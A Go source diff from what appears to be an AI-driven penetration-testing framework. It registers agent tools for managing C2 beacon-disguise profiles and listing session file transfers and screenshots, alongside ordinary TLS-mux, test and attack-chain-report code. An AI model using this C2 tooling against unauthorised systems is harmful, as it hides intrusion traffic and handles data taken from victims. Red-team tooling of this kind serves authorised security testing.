// ============================================================================
func registerC2ProfileTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
s.RegisterTool(mcp.Tool{
Name: builtin.ToolC2Profile,
Description: `C2 Malleable Profile 管理(控制 beacon 通信伪装)。通过 action 参数选择操作:
- list: 列出所有 Profile
- get: 获取 Profile 详情(需 profile_id
- create: 创建 Profile(需 name,可选 user_agent/uris/request_headers/response_headers/body_template/jitter_min_ms/jitter_max_ms
- update: 更新 Profile(需 profile_id
- delete: 删除 Profile(需 profile_id`,
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"action": map[string]interface{}{"type": "string", "description": "操作: list/get/create/update/delete", "enum": []string{"list", "get", "create", "update", "delete"}},
"profile_id": map[string]interface{}{"type": "string", "description": "Profile IDget/update/delete 需要)"},
"name": map[string]interface{}{"type": "string", "description": "Profile 名称"},
"user_agent": map[string]interface{}{"type": "string", "description": "User-Agent 字符串"},
"uris": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "beacon 请求的 URI 列表"},
"request_headers": map[string]interface{}{"type": "object", "description": "自定义请求头"},
"response_headers": map[string]interface{}{"type": "object", "description": "自定义响应头"},
"body_template": map[string]interface{}{"type": "string", "description": "响应体模板"},
"jitter_min_ms": map[string]interface{}{"type": "integer", "description": "最小抖动(毫秒)"},
"jitter_max_ms": map[string]interface{}{"type": "integer", "description": "最大抖动(毫秒)"},
},
"required": []string{"action"},
},
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
action := getString(params, "action")
id := getString(params, "profile_id")
switch action {
case "list":
profiles, err := m.DB().ListC2Profiles()
return makeC2Result(map[string]interface{}{"profiles": profiles, "count": len(profiles)}, err)
case "get":
profile, err := m.DB().GetC2Profile(id)
if err != nil {
return makeC2Result(nil, err)
}
if profile == nil {
return makeC2Result(nil, fmt.Errorf("profile not found"))
}
return makeC2Result(map[string]interface{}{"profile": profile}, nil)
case "create":
profile := &database.C2Profile{
ID: "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14],
Name: getString(params, "name"),
UserAgent: getString(params, "user_agent"),
BodyTemplate: getString(params, "body_template"),
JitterMinMS: int(getFloat64(params, "jitter_min_ms")),
JitterMaxMS: int(getFloat64(params, "jitter_max_ms")),
CreatedAt: time.Now(),
}
if uris, ok := params["uris"]; ok {
if arr, ok := uris.([]interface{}); ok {
for _, u := range arr {
if s, ok := u.(string); ok {
profile.URIs = append(profile.URIs, s)
}
}
}
}
if rh, ok := params["request_headers"]; ok {
if m, ok := rh.(map[string]interface{}); ok {
profile.RequestHeaders = make(map[string]string)
for k, v := range m {
profile.RequestHeaders[k], _ = v.(string)
}
}
}
if rh, ok := params["response_headers"]; ok {
if m, ok := rh.(map[string]interface{}); ok {
profile.ResponseHeaders = make(map[string]string)
for k, v := range m {
profile.ResponseHeaders[k], _ = v.(string)
}
}
}
if err := m.DB().CreateC2Profile(profile); err != nil {
return makeC2Result(nil, err)
}
return makeC2Result(map[string]interface{}{"profile": profile}, nil)
case "update":
profile, err := m.DB().GetC2Profile(id)
if err != nil {
return makeC2Result(nil, err)
}
if profile == nil {
return makeC2Result(nil, fmt.Errorf("profile not found"))
}
if v := getString(params, "name"); v != "" {
profile.Name = v
}
if v := getString(params, "user_agent"); v != "" {
profile.UserAgent = v
}
if v := getString(params, "body_template"); v != "" {
profile.BodyTemplate = v
}
if v := int(getFloat64(params, "jitter_min_ms")); v > 0 {
profile.JitterMinMS = v
}
if v := int(getFloat64(params, "jitter_max_ms")); v > 0 {
profile.JitterMaxMS = v
}
if uris, ok := params["uris"]; ok {
if arr, ok := uris.([]interface{}); ok {
profile.URIs = nil
for _, u := range arr {
if s, ok := u.(string); ok {
profile.URIs = append(profile.URIs, s)
}
}
}
}
if rh, ok := params["request_headers"]; ok {
if mp, ok := rh.(map[string]interface{}); ok {
profile.RequestHeaders = make(map[string]string)
for k, v := range mp {
profile.RequestHeaders[k], _ = v.(string)
}
}
}
if rh, ok := params["response_headers"]; ok {
if mp, ok := rh.(map[string]interface{}); ok {
profile.ResponseHeaders = make(map[string]string)
for k, v := range mp {
profile.ResponseHeaders[k], _ = v.(string)
}
}
}
if err := m.DB().UpdateC2Profile(profile); err != nil {
return makeC2Result(nil, err)
}
return makeC2Result(map[string]interface{}{"profile": profile}, nil)
case "delete":
err := m.DB().DeleteC2Profile(id)
return makeC2Result(map[string]interface{}{"deleted": err == nil}, err)
default:
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
}
})
}
// ============================================================================
// c2_file — 文件管理工具(新增)
// ============================================================================
func registerC2FileTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
s.RegisterTool(mcp.Tool{
Name: builtin.ToolC2File,
Description: `C2 文件管理。通过 action 参数选择操作:
- list: 列出会话的文件传输记录(需 session_id
- get_result: 获取任务结果文件路径(截图等,需 task_id)`,
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"action": map[string]interface{}{"type": "string", "description": "操作: list/get_result", "enum": []string{"list", "get_result"}},
"session_id": map[string]interface{}{"type": "string", "description": "会话 IDlist 需要)"},
"task_id": map[string]interface{}{"type": "string", "description": "任务 IDget_result 需要)"},
},
"required": []string{"action"},
},
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
action := getString(params, "action")
switch action {
case "list":
sessionID := getString(params, "session_id")
if sessionID == "" {
return makeC2Result(nil, fmt.Errorf("session_id required"))
}
files, err := m.DB().ListC2FilesBySession(sessionID)
return makeC2Result(map[string]interface{}{"files": files, "count": len(files)}, err)
case "get_result":
taskID := getString(params, "task_id")
task, err := m.DB().GetC2Task(taskID)
if err != nil {
return makeC2Result(nil, err)
}
if task == nil {
return makeC2Result(nil, fmt.Errorf("task not found"))
}
if task.ResultBlobPath == "" {
return makeC2Result(map[string]interface{}{"has_file": false, "task_id": taskID}, nil)
}
return makeC2Result(map[string]interface{}{
"has_file": true,
"task_id": taskID,
"file_path": task.ResultBlobPath,
}, nil)
default:
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
}
})
}
// ============================================================================
// 工具函数
// ============================================================================
func getString(params map[string]interface{}, key string) string {
if v, ok := params[key]; ok {
if s, ok := v.(string); ok {
return s
}
}
return ""
}
func getFloat64(params map[string]interface{}, key string) float64 {
if v, ok := params[key]; ok {
switch n := v.(type) {
case float64:
return n
case int:
return float64(n)
case string:
if f, err := strconv.ParseFloat(n, 64); err == nil {
return f
}
}
}
return 0
}
+196
View File
@@ -0,0 +1,196 @@
package app
import (
"bufio"
"context"
"crypto/tls"
"errors"
"fmt"
"net"
"net/http"
"strconv"
"sync"
"time"
"go.uber.org/zap"
)
// peekedConn 在已预读首字节后仍将连接交给 net/http 或 crypto/tls。
type peekedConn struct {
net.Conn
r *bufio.Reader
}
func (c *peekedConn) Read(p []byte) (int, error) {
return c.r.Read(p)
}
// oneConnListener 供 http.Server.Serve 处理单条 TCP 连接(含 keep-alive)。
type oneConnListener struct {
conn net.Conn
addr net.Addr
once sync.Once
}
func (l *oneConnListener) Accept() (net.Conn, error) {
var c net.Conn
l.once.Do(func() {
c = l.conn
l.conn = nil
})
if c == nil {
return nil, net.ErrClosed
}
return c, nil
}
func (l *oneConnListener) Close() error { return nil }
func (l *oneConnListener) Addr() net.Addr { return l.addr }
func isTLSHandshakeRecord(b byte) bool {
return b == 0x16
}
func newHTTPToHTTPSRedirectHandler(httpsPort int) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
host := r.Host
if h, _, err := net.SplitHostPort(host); err == nil {
host = h
}
var target string
if httpsPort == 443 {
target = fmt.Sprintf("https://%s%s", host, r.URL.RequestURI())
} else {
target = fmt.Sprintf("https://%s:%d%s", host, httpsPort, r.URL.RequestURI())
}
http.Redirect(w, r, target, http.StatusPermanentRedirect)
})
}
func portFromListenAddr(addr string) int {
_, portStr, err := net.SplitHostPort(addr)
if err != nil {
return 443
}
p, err := strconv.Atoi(portStr)
if err != nil || p <= 0 {
return 443
}
return p
}
func ensureMainTLSConfigCerts(mode mainTLSMode, tlsConf *tls.Config, certFile, keyFile string) (*tls.Config, error) {
if mode != mainTLSFromFiles {
return tlsConf, nil
}
if tlsConf == nil {
tlsConf = &tls.Config{MinVersion: tls.VersionTLS12}
}
if len(tlsConf.Certificates) > 0 {
return tlsConf, nil
}
cert, err := tls.LoadX509KeyPair(certFile, keyFile)
if err != nil {
return nil, err
}
tlsConf.Certificates = []tls.Certificate{cert}
return tlsConf, nil
}
type mainServerMux struct {
ln net.Listener
httpsSrv *http.Server
redirectSrv *http.Server
logger *zap.Logger
}
func newMainServerMux(ln net.Listener, httpsSrv *http.Server, httpsPort int, logger *zap.Logger) *mainServerMux {
return &mainServerMux{
ln: ln,
httpsSrv: httpsSrv,
redirectSrv: &http.Server{Handler: newHTTPToHTTPSRedirectHandler(httpsPort), ReadHeaderTimeout: 10 * time.Second},
logger: logger,
}
}
func (m *mainServerMux) Serve() error {
for {
conn, err := m.ln.Accept()
if err != nil {
if errors.Is(err, net.ErrClosed) {
return http.ErrServerClosed
}
return err
}
go m.handleConn(conn)
}
}
func (m *mainServerMux) handleConn(raw net.Conn) {
if err := raw.SetReadDeadline(time.Now().Add(10 * time.Second)); err != nil {
_ = raw.Close()
return
}
br := bufio.NewReader(raw)
b, err := br.Peek(1)
if err != nil {
_ = raw.Close()
return
}
_ = raw.SetReadDeadline(time.Time{})
pc := &peekedConn{Conn: raw, r: br}
ocl := &oneConnListener{conn: pc, addr: raw.LocalAddr()}
if isTLSHandshakeRecord(b[0]) {
m.serveHTTPS(pc, raw.LocalAddr())
return
}
if err := m.redirectSrv.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) {
m.logger.Debug("HTTP 重定向连接处理结束", zap.Error(err))
}
}
// serveHTTPS 在已嗅探为 TLS 的连接上完成握手,再按 ALPN 走 HTTP/2 或 HTTP/1.1。
// 不能对同一 http.Server 并发调用 Serve(TLSConfig!=nil),否则握手/ALPN 会异常(浏览器 ERR_SSL_PROTOCOL_ERROR)。
func (m *mainServerMux) serveHTTPS(pc *peekedConn, localAddr net.Addr) {
tlsConn := tls.Server(pc, m.httpsSrv.TLSConfig)
handCtx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
defer cancel()
if err := tlsConn.HandshakeContext(handCtx); err != nil {
m.logger.Debug("TLS 握手失败", zap.Error(err))
_ = pc.Close()
return
}
srv := m.httpsSrv
if srv.TLSNextProto != nil {
proto := tlsConn.ConnectionState().NegotiatedProtocol
if fn := srv.TLSNextProto[proto]; fn != nil {
fn(srv, tlsConn, srv.Handler)
return
}
}
plain := *srv
plain.TLSConfig = nil
ocl := &oneConnListener{conn: tlsConn, addr: localAddr}
if err := plain.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) {
m.logger.Debug("HTTPS 连接处理结束", zap.Error(err))
}
}
func (m *mainServerMux) Shutdown(ctx context.Context) error {
_ = m.ln.Close()
var err1, err2 error
if m.httpsSrv != nil {
err1 = m.httpsSrv.Shutdown(ctx)
}
if m.redirectSrv != nil {
err2 = m.redirectSrv.Shutdown(ctx)
}
if err1 != nil {
return err1
}
return err2
}
@@ -0,0 +1,150 @@
package app
import (
"crypto/tls"
"io"
"net"
"net/http"
"net/http/httptest"
"strconv"
"testing"
"cyberstrike-ai/internal/config"
"golang.org/x/net/http2"
)
func TestNewHTTPToHTTPSRedirectHandler(t *testing.T) {
t.Parallel()
tests := []struct {
name string
httpsPort int
host string
uri string
wantTarget string
}{
{
name: "non standard port",
httpsPort: 8080,
host: "127.0.0.1:8080",
uri: "/login?next=/",
wantTarget: "https://127.0.0.1:8080/login?next=/",
},
{
name: "standard port",
httpsPort: 443,
host: "example.com:80",
uri: "/",
wantTarget: "https://example.com/",
},
}
for _, tt := range tests {
tt := tt
t.Run(tt.name, func(t *testing.T) {
t.Parallel()
h := newHTTPToHTTPSRedirectHandler(tt.httpsPort)
req := httptest.NewRequest(http.MethodGet, "http://"+tt.host+tt.uri, nil)
req.Host = tt.host
rec := httptest.NewRecorder()
h.ServeHTTP(rec, req)
if rec.Code != http.StatusPermanentRedirect {
t.Fatalf("status = %d, want %d", rec.Code, http.StatusPermanentRedirect)
}
if got := rec.Header().Get("Location"); got != tt.wantTarget {
t.Fatalf("Location = %q, want %q", got, tt.wantTarget)
}
})
}
}
func TestIsTLSHandshakeRecord(t *testing.T) {
t.Parallel()
if !isTLSHandshakeRecord(0x16) {
t.Fatal("expected TLS handshake record")
}
if isTLSHandshakeRecord('G') {
t.Fatal("GET should not be TLS")
}
}
func TestServerHTTPRedirectEnabled(t *testing.T) {
t.Parallel()
disabled := false
enabled := true
if config.ServerHTTPRedirectEnabled(nil) {
t.Fatal("nil config should disable redirect")
}
if !config.ServerHTTPRedirectEnabled(&config.ServerConfig{TLSEnabled: true}) {
t.Fatal("HTTPS without explicit flag should enable redirect")
}
if config.ServerHTTPRedirectEnabled(&config.ServerConfig{TLSEnabled: true, TLSHTTPRedirect: &disabled}) {
t.Fatal("explicit false should disable redirect")
}
if !config.ServerHTTPRedirectEnabled(&config.ServerConfig{TLSEnabled: true, TLSHTTPRedirect: &enabled}) {
t.Fatal("explicit true should enable redirect")
}
if config.ServerHTTPRedirectEnabled(&config.ServerConfig{}) {
t.Fatal("plain HTTP should not redirect")
}
}
func TestMainServerMuxHTTPRedirectAndHTTPS(t *testing.T) {
cert, err := generateMainServerSelfSignedCert()
if err != nil {
t.Fatalf("generate cert: %v", err)
}
handler := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
_, _ = io.WriteString(w, "ok")
})
srv := &http.Server{Handler: handler, TLSConfig: &tls.Config{
MinVersion: tls.VersionTLS12,
Certificates: []tls.Certificate{cert},
}}
if err := http2.ConfigureServer(srv, &http2.Server{}); err != nil {
t.Fatalf("configure http2: %v", err)
}
ln, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
t.Fatalf("listen: %v", err)
}
defer ln.Close()
mux := newMainServerMux(ln, srv, portFromListenAddr(ln.Addr().String()), nil)
go func() { _ = mux.Serve() }()
client := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true, MinVersion: tls.VersionTLS12},
},
CheckRedirect: func(_ *http.Request, _ []*http.Request) error {
return http.ErrUseLastResponse
},
}
addr := ln.Addr().String()
httpResp, err := client.Get("http://" + addr + "/")
if err != nil {
t.Fatalf("http get: %v", err)
}
_ = httpResp.Body.Close()
if httpResp.StatusCode != http.StatusPermanentRedirect {
t.Fatalf("http status = %d, want %d", httpResp.StatusCode, http.StatusPermanentRedirect)
}
if got := httpResp.Header.Get("Location"); got != "https://127.0.0.1:"+strconv.Itoa(portFromListenAddr(addr))+"/" {
t.Fatalf("Location = %q", got)
}
httpsResp, err := client.Get("https://" + addr + "/")
if err != nil {
t.Fatalf("https get: %v", err)
}
defer httpsResp.Body.Close()
if httpsResp.StatusCode != http.StatusOK {
t.Fatalf("https status = %d, want %d", httpsResp.StatusCode, http.StatusOK)
}
body, _ := io.ReadAll(httpsResp.Body)
if string(body) != "ok" {
t.Fatalf("body = %q, want ok", body)
}
}
+86
View File
@@ -0,0 +1,86 @@
package app
import (
"crypto/ecdsa"
"crypto/elliptic"
"crypto/rand"
"crypto/tls"
"crypto/x509"
"crypto/x509/pkix"
"encoding/pem"
"fmt"
"math/big"
"net"
"strings"
"time"
"cyberstrike-ai/internal/config"
)
// mainTLSMode 主 Web 服务 TLS 启动方式。
type mainTLSMode int
const (
mainTLSOff mainTLSMode = iota
mainTLSFromFiles
mainTLSInMemorySelfSigned
)
// prepareMainServerTLS 根据 server 配置决定主站是否启用 HTTPS(及 HTTP/2 协商)。
// fromFiles:使用 tls_cert_path + tls_key_path,由 http.Server.ListenAndServeTLS 加载 PEM。
// inMemorytls_auto_self_sign 生成的自签证书,仅用于本地/测试。
func prepareMainServerTLS(cfg *config.ServerConfig) (mode mainTLSMode, tlsConf *tls.Config, certFile, keyFile string, err error) {
if cfg == nil || !config.MainWebUIUsesHTTPS(cfg) {
return mainTLSOff, nil, "", "", nil
}
certFile = strings.TrimSpace(cfg.TLSCertPath)
keyFile = strings.TrimSpace(cfg.TLSKeyPath)
if certFile != "" && keyFile != "" {
// 证书由 ListenAndServeTLS 从文件加载;此处仅提供最小 TLS 配置供 http2.ConfigureServer 合并 ALPN。
return mainTLSFromFiles, &tls.Config{MinVersion: tls.VersionTLS12}, certFile, keyFile, nil
}
if cfg.TLSAutoSelfSign {
cert, genErr := generateMainServerSelfSignedCert()
if genErr != nil {
return mainTLSOff, nil, "", "", fmt.Errorf("生成自签 TLS 证书: %w", genErr)
}
tlsConf = &tls.Config{
MinVersion: tls.VersionTLS12,
Certificates: []tls.Certificate{cert},
}
return mainTLSInMemorySelfSigned, tlsConf, "", "", nil
}
return mainTLSOff, nil, "", "", fmt.Errorf("server: 已启用 TLStls_enabled / tls_auto_self_sign / 证书路径),请设置 tls_cert_path 与 tls_key_path,或将 tls_auto_self_sign 设为 true(仅测试环境)")
}
func generateMainServerSelfSignedCert() (tls.Certificate, error) {
priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
if err != nil {
return tls.Certificate{}, err
}
serial, err := rand.Int(rand.Reader, big.NewInt(1<<62))
if err != nil {
return tls.Certificate{}, err
}
tmpl := &x509.Certificate{
SerialNumber: serial,
Subject: pkix.Name{CommonName: "CyberStrikeAI"},
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(365 * 24 * time.Hour),
KeyUsage: x509.KeyUsageDigitalSignature,
ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
IPAddresses: []net.IP{net.ParseIP("127.0.0.1"), net.ParseIP("::1")},
DNSNames: []string{"localhost"},
}
der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv)
if err != nil {
return tls.Certificate{}, err
}
keyDER, err := x509.MarshalECPrivateKey(priv)
if err != nil {
return tls.Certificate{}, err
}
certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})
keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER})
return tls.X509KeyPair(certPEM, keyPEM)
}
+93 -74
View File
@@ -82,7 +82,7 @@ func NewBuilder(db *database.DB, openAIConfig *config.OpenAIConfig, logger *zap.
} }
} }
// BuildChainFromConversation 从对话构建攻击链(简化版本:用户输入+最后一轮ReAct输入+大模型输出) // BuildChainFromConversation 从对话构建攻击链(单次 LLM 调用;输入为当前任务轮次的 last_react 轨迹,与继续对话续跑范围一致)。
func (b *Builder) BuildChainFromConversation(ctx context.Context, conversationID string) (*Chain, error) { func (b *Builder) BuildChainFromConversation(ctx context.Context, conversationID string) (*Chain, error) {
b.logger.Info("开始构建攻击链(简化版本)", zap.String("conversationId", conversationID)) b.logger.Info("开始构建攻击链(简化版本)", zap.String("conversationId", conversationID))
@@ -145,7 +145,7 @@ func (b *Builder) BuildChainFromConversation(ctx context.Context, conversationID
} }
// 1. 优先尝试从数据库获取保存的最后一轮ReAct输入和输出 // 1. 优先尝试从数据库获取保存的最后一轮ReAct输入和输出
reactInputJSON, modelOutput, err := b.db.GetReActData(conversationID) reactInputJSON, modelOutput, err := b.db.GetAgentTrace(conversationID)
if err != nil { if err != nil {
b.logger.Warn("获取保存的ReAct数据失败,将使用消息历史构建", zap.Error(err)) b.logger.Warn("获取保存的ReAct数据失败,将使用消息历史构建", zap.Error(err))
// 继续使用原来的逻辑 // 继续使用原来的逻辑
@@ -157,33 +157,34 @@ func (b *Builder) BuildChainFromConversation(ctx context.Context, conversationID
var reactInputFinal string var reactInputFinal string
var dataSource string // 记录数据来源 var dataSource string // 记录数据来源
// 如果成功获取到保存的ReAct数据,直接使用 // 优先使用落库的代理轨迹(与继续对话 loadHistoryFromAgentTrace 同源),并裁剪为「当前任务轮次」
if reactInputJSON != "" && modelOutput != "" { if reactInputJSON != "" {
// 计算 ReAct 输入的哈希值,用于追踪 trimmedJSON := agent.ExtractLastUserTurnTraceJSON(reactInputJSON)
hash := sha256.Sum256([]byte(reactInputJSON)) hash := sha256.Sum256([]byte(trimmedJSON))
reactInputHash := hex.EncodeToString(hash[:])[:16] // 使用前16字符作为短标识 reactInputHash := hex.EncodeToString(hash[:])[:16]
// 统计消息数量
var messageCount int var messageCount int
var tempMessages []interface{} if msgs, parseErr := agent.ParseTraceMessages(trimmedJSON); parseErr == nil {
if json.Unmarshal([]byte(reactInputJSON), &tempMessages) == nil { messageCount = len(msgs)
messageCount = len(tempMessages) msgs = agent.MergeAssistantTraceOutput(msgs, modelOutput)
reactInputFinal = b.formatAgentTraceFromChatMessages(msgs)
} else {
b.logger.Warn("解析代理轨迹失败,回退原始 JSON 格式化", zap.Error(parseErr))
reactInputFinal = b.formatAgentTraceInputFromJSON(trimmedJSON)
if strings.TrimSpace(modelOutput) != "" {
reactInputFinal += "\n\n## 助手结论(last_react_output\n\n" + modelOutput
}
} }
dataSource = "database_last_react_input" dataSource = "last_user_turn_agent_trace"
b.logger.Info("使用保存的ReAct数据构建攻击链", b.logger.Info("使用当前任务轮次代理轨迹构建攻击链(与续跑上下文范围一致)",
zap.String("conversationId", conversationID), zap.String("conversationId", conversationID),
zap.String("dataSource", dataSource), zap.String("dataSource", dataSource),
zap.Int("reactInputSize", len(reactInputJSON)), zap.Int("traceInputSizeBeforeTrim", len(reactInputJSON)),
zap.Int("traceInputSizeAfterTrim", len(trimmedJSON)),
zap.Int("messageCount", messageCount), zap.Int("messageCount", messageCount),
zap.String("reactInputHash", reactInputHash), zap.String("reactInputHash", reactInputHash),
zap.Int("modelOutputSize", len(modelOutput))) zap.Int("modelOutputSize", len(modelOutput)))
// 从保存的ReAct输入(JSON格式)中提取用户输入
// userInput = b.extractUserInputFromReActInput(reactInputJSON)
// 将JSON格式的messages转换为可读格式
reactInputFinal = b.formatReActInputFromJSON(reactInputJSON)
} else { } else {
// 2. 如果没有保存的ReAct数据,从对话消息构建 // 2. 如果没有保存的ReAct数据,从对话消息构建
dataSource = "messages_table" dataSource = "messages_table"
@@ -201,7 +202,7 @@ func (b *Builder) BuildChainFromConversation(ctx context.Context, conversationID
} }
// 提取最后一轮ReAct的输入(历史消息+当前用户输入) // 提取最后一轮ReAct的输入(历史消息+当前用户输入)
reactInputFinal = b.buildReActInput(messages) reactInputFinal = b.buildAgentTraceInput(messages)
// 提取大模型最后的输出(最后一条assistant消息) // 提取大模型最后的输出(最后一条assistant消息)
for i := len(messages) - 1; i >= 0; i-- { for i := len(messages) - 1; i >= 0; i-- {
@@ -212,7 +213,7 @@ func (b *Builder) BuildChainFromConversation(ctx context.Context, conversationID
} }
} }
// 多代理:保存的 last_react_input 可能仅为首轮用户消息,不含工具轨迹;补充最后一轮助手的过程详情(与单代理「最后一轮 ReAct」对齐) // 多代理:保存的轨迹列可能仅为首轮用户消息,不含工具轨迹;补充最后一轮助手的过程详情(与单代理完整轨迹对齐)
hasMCPOnAssistant := false hasMCPOnAssistant := false
var lastAssistantID string var lastAssistantID string
for i := len(messages) - 1; i >= 0; i-- { for i := len(messages) - 1; i >= 0; i-- {
@@ -243,8 +244,15 @@ func (b *Builder) BuildChainFromConversation(ctx context.Context, conversationID
} }
} }
// 3. 构建简化的prompt,一次性传递给大模型 // 3. 按 token 预算压缩输入,再构建 prompt(避免超出模型上下文)
prompt := b.buildSimplePrompt(reactInputFinal, modelOutput) reactInputFinal, modelOutput, _ = b.fitAttackChainPayload(reactInputFinal, modelOutput)
// 4. 构建 prompt 并单次调用大模型(助手结论已并入轨迹时不再重复传入)
promptAssistantOut := modelOutput
if reactInputJSON != "" {
promptAssistantOut = ""
}
prompt := b.buildSimplePrompt(reactInputFinal, promptAssistantOut)
// fmt.Println(prompt) // fmt.Println(prompt)
// 6. 调用AI生成攻击链(一次性,不做任何处理) // 6. 调用AI生成攻击链(一次性,不做任何处理)
chainJSON, err := b.callAIForChainGeneration(ctx, prompt) chainJSON, err := b.callAIForChainGeneration(ctx, prompt)
@@ -301,7 +309,7 @@ func (b *Builder) formatProcessDetailsForAttackChain(details []database.ProcessD
// 目标:以主 agent(编排器)视角输出整轮迭代 // 目标:以主 agent(编排器)视角输出整轮迭代
// - 保留:编排器工具调用/结果、对子代理的 task 调度、子代理最终回复(不含推理) // - 保留:编排器工具调用/结果、对子代理的 task 调度、子代理最终回复(不含推理)
// - 丢弃:thinking/planning/progress 等噪声、子代理的工具细节与推理过程 // - 丢弃:thinking/planning/progress 等噪声、子代理的工具细节与推理过程
if d.EventType == "progress" || d.EventType == "thinking" || d.EventType == "planning" { if d.EventType == "progress" || d.EventType == "thinking" || d.EventType == "reasoning_chain" || d.EventType == "planning" {
continue continue
} }
@@ -320,7 +328,7 @@ func (b *Builder) formatProcessDetailsForAttackChain(details []database.ProcessD
} }
// 1) 编排器的工具调用/结果:保留(这是“主 agent 调了什么工具”) // 1) 编排器的工具调用/结果:保留(这是“主 agent 调了什么工具”)
if (d.EventType == "tool_call" || d.EventType == "tool_result" || d.EventType == "tool_calls_detected" || d.EventType == "iteration" || d.EventType == "eino_recovery") && einoRole == "orchestrator" { if (d.EventType == "tool_call" || d.EventType == "tool_result" || d.EventType == "tool_calls_detected" || d.EventType == "iteration") && einoRole == "orchestrator" {
sb.WriteString("[") sb.WriteString("[")
sb.WriteString(d.EventType) sb.WriteString(d.EventType)
sb.WriteString("] ") sb.WriteString("] ")
@@ -366,10 +374,17 @@ func (b *Builder) formatProcessDetailsForAttackChain(details []database.ProcessD
return strings.TrimSpace(sb.String()) return strings.TrimSpace(sb.String())
} }
// buildReActInput 构建最后一轮ReAct的输入(历史消息+当前用户输入) // buildAgentTraceInput 构建最后一轮 ReAct 的输入(从最后一条 user 消息起,不含更早轮次)。
func (b *Builder) buildReActInput(messages []database.Message) string { func (b *Builder) buildAgentTraceInput(messages []database.Message) string {
start := 0
for i := len(messages) - 1; i >= 0; i-- {
if strings.EqualFold(messages[i].Role, "user") {
start = i
break
}
}
var builder strings.Builder var builder strings.Builder
for _, msg := range messages { for _, msg := range messages[start:] {
builder.WriteString(fmt.Sprintf("[%s]: %s\n\n", msg.Role, msg.Content)) builder.WriteString(fmt.Sprintf("[%s]: %s\n\n", msg.Role, msg.Content))
} }
return builder.String() return builder.String()
@@ -396,67 +411,66 @@ func (b *Builder) buildReActInput(messages []database.Message) string {
// return "" // return ""
// } // }
// formatReActInputFromJSON 将JSON格式的messages数组转换为可读的字符串格式 // formatAgentTraceInputFromJSON 将 JSON 轨迹转为可读文本(会先按当前任务轮次裁剪)。
func (b *Builder) formatReActInputFromJSON(reactInputJSON string) string { func (b *Builder) formatAgentTraceInputFromJSON(reactInputJSON string) string {
var messages []map[string]interface{} trimmed := agent.ExtractLastUserTurnTraceJSON(reactInputJSON)
if err := json.Unmarshal([]byte(reactInputJSON), &messages); err != nil { msgs, err := agent.ParseTraceMessages(trimmed)
if err != nil {
b.logger.Warn("解析ReAct输入JSON失败", zap.Error(err)) b.logger.Warn("解析ReAct输入JSON失败", zap.Error(err))
return reactInputJSON // 如果解析失败,返回原始JSON return trimmed
} }
return b.formatAgentTraceFromChatMessages(msgs)
}
// formatAgentTraceFromChatMessages 将代理消息带格式化为攻击链分析输入(与续跑轨迹字段一致)。
func (b *Builder) formatAgentTraceFromChatMessages(msgs []agent.ChatMessage) string {
var builder strings.Builder var builder strings.Builder
for _, msg := range messages { for _, msg := range msgs {
role, _ := msg["role"].(string) role := msg.Role
content, _ := msg["content"].(string) content := msg.Content
// 处理assistant消息:提取tool_calls信息 if strings.EqualFold(role, "assistant") && len(msg.ToolCalls) > 0 {
if role == "assistant" { if content != "" {
if toolCalls, ok := msg["tool_calls"].([]interface{}); ok && len(toolCalls) > 0 { builder.WriteString(fmt.Sprintf("[%s]: %s\n", role, content))
// 如果有文本内容,先显示 }
if content != "" { builder.WriteString(fmt.Sprintf("[%s] 工具调用 (%d个):\n", role, len(msg.ToolCalls)))
builder.WriteString(fmt.Sprintf("[%s]: %s\n", role, content)) for i, tc := range msg.ToolCalls {
} args := ""
// 详细显示每个工具调用 if tc.Function.Arguments != nil {
builder.WriteString(fmt.Sprintf("[%s] 工具调用 (%d个):\n", role, len(toolCalls))) if b, err := json.Marshal(tc.Function.Arguments); err == nil {
for i, toolCall := range toolCalls { args = string(b)
if tc, ok := toolCall.(map[string]interface{}); ok {
toolCallID, _ := tc["id"].(string)
if funcData, ok := tc["function"].(map[string]interface{}); ok {
toolName, _ := funcData["name"].(string)
arguments, _ := funcData["arguments"].(string)
builder.WriteString(fmt.Sprintf(" [工具调用 %d]\n", i+1))
builder.WriteString(fmt.Sprintf(" ID: %s\n", toolCallID))
builder.WriteString(fmt.Sprintf(" 工具名称: %s\n", toolName))
builder.WriteString(fmt.Sprintf(" 参数: %s\n", arguments))
}
} }
} }
builder.WriteString("\n") builder.WriteString(fmt.Sprintf(" [工具调用 %d]\n", i+1))
continue builder.WriteString(fmt.Sprintf(" ID: %s\n", tc.ID))
builder.WriteString(fmt.Sprintf(" 工具名称: %s\n", tc.Function.Name))
builder.WriteString(fmt.Sprintf(" 参数: %s\n", args))
} }
builder.WriteString("\n")
continue
} }
// 处理tool消息:显示tool_call_id和完整内容 if strings.EqualFold(role, "tool") {
if role == "tool" { if msg.ToolCallID != "" {
toolCallID, _ := msg["tool_call_id"].(string) builder.WriteString(fmt.Sprintf("[%s] (tool_call_id: %s):\n%s\n\n", role, msg.ToolCallID, content))
if toolCallID != "" {
